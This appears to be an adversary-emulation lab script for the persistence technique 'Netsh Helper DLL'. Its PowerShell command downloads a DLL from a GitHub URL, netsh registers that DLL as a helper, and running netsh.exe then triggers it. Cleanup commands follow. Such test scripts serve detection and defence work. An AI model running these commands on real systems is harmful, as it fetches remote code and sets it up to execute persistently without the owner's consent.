
Event Triggered Execution: Netsh Helper DLL

---------------------------------------------------

powershell -Command "Invoke-WebRequest -Uri https://github.com/PaulaMerino/TFM/raw/main/exec/dllExampleInjection2.dll -OutFile '%USERPROFILE%\Downloads\dllExampleInjection2.dll'"
netsh add helper %USERPROFILE%\Downloads\dllExampleInjection2.dll

netsh.exe

---------------------------------------------------

CLEAN UP 
del %USERPROFILE%\Downloads\dllExampleInjection2.dll
netsh delete helper %USERPROFILE%\Downloads\dllExampleInjection2.dll



